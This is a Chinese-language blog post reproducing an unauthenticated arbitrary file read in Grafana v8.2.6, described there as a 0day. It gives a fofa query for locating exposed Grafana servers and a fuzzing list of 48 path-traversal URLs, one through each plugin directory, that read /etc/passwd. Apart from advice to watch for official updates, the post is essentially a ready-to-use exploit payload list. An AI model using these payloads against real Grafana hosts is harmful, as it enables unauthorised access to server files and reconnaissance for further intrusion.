Grafana 未授权任意文件读取漏洞
漏洞原理:
Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。
CVE编号:
暂无,处0day状态
fofa语法:
app="Grafana"
影响范围:
Grafana v8.2.6
漏洞复现:
因为不知道Grafana安装了什么插件需要模糊测试:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 | /public/plugins/alertGroups/../../../../../../../../etc/passwd/public/plugins/alertlist/../../../../../../../../etc/passwd/public/plugins/alertmanager/../../../../../../../../etc/passwd/public/plugins/annolist/../../../../../../../../etc/passwd/public/plugins/barchart/../../../../../../../../etc/passwd/public/plugins/bargauge/../../../../../../../../etc/passwd/public/plugins/canvas/../../../../../../../../etc/passwd/public/plugins/cloudwatch/../../../../../../../../etc/passwd/public/plugins/dashboard/../../../../../../../../etc/passwd/public/plugins/dashlist/../../../../../../../../etc/passwd/public/plugins/debug/../../../../../../../../etc/passwd/public/plugins/elasticsearch/../../../../../../../../etc/passwd/public/plugins/gauge/../../../../../../../../etc/passwd/public/plugins/geomap/../../../../../../../../etc/passwd/public/plugins/gettingstarted/../../../../../../../../etc/passwd/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd/public/plugins/grafana/../../../../../../../../etc/passwd/public/plugins/graph/../../../../../../../../etc/passwd/public/plugins/graphite/../../../../../../../../etc/passwd/public/plugins/heatmap/../../../../../../../../etc/passwd/public/plugins/histogram/../../../../../../../../etc/passwd/public/plugins/influxdb/../../../../../../../../etc/passwd/public/plugins/jaeger/../../../../../../../../etc/passwd/public/plugins/live/../../../../../../../../etc/passwd/public/plugins/logs/../../../../../../../../etc/passwd/public/plugins/loki/../../../../../../../../etc/passwd/public/plugins/mixed/../../../../../../../../etc/passwd/public/plugins/mssql/../../../../../../../../etc/passwd/public/plugins/mysql/../../../../../../../../etc/passwd/public/plugins/news/../../../../../../../../etc/passwd/public/plugins/nodeGraph/../../../../../../../../etc/passwd/public/plugins/opentsdb/../../../../../../../../etc/passwd/public/plugins/piechart/../../../../../../../../etc/passwd/public/plugins/pluginlist/../../../../../../../../etc/passwd/public/plugins/postgres/../../../../../../../../etc/passwd/public/plugins/prometheus/../../../../../../../../etc/passwd/public/plugins/stat/../../../../../../../../etc/passwd/public/plugins/state-timeline/../../../../../../../../etc/passwd/public/plugins/status-history/../../../../../../../../etc/passwd/public/plugins/table-old/../../../../../../../../etc/passwd/public/plugins/table/../../../../../../../../etc/passwd/public/plugins/tempo/../../../../../../../../etc/passwd/public/plugins/testdata/../../../../../../../../etc/passwd/public/plugins/text/../../../../../../../../etc/passwd/public/plugins/timeseries/../../../../../../../../etc/passwd/public/plugins/welcome/../../../../../../../../etc/passwd/public/plugins/xychart/../../../../../../../../etc/passwd/public/plugins/zipkin/../../../../../../../../etc/passwd |
修复建议:
关注https://grafana.com/ 官方更新。
分类:
漏洞复现
博主公众号:White OWL
资料多多,教程多多呦,欢迎各位表哥关注(づ ̄ 3 ̄)づ
【推荐】还在用 ECharts 开发大屏?试试这款永久免费的开源 BI 工具!
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· .NET制作智能桌面机器人:结合BotSharp智能体框架开发语音交互
· 软件产品开发中常见的10个问题及处理方法
· .NET 原生驾驭 AI 新基建实战系列:向量数据库的应用与畅想
· 从问题排查到源码分析:ActiveMQ消费端频繁日志刷屏的秘密
· 一次Java后端服务间歇性响应慢的问题排查记录
· 互联网不景气了那就玩玩嵌入式吧,用纯.NET开发并制作一个智能桌面机器人(四):结合BotSharp
· 一个基于 .NET 开源免费的异地组网和内网穿透工具
· 《HelloGitHub》第 108 期
· Windows桌面应用自动更新解决方案SharpUpdater5发布
· 我的家庭实验室服务器集群硬件清单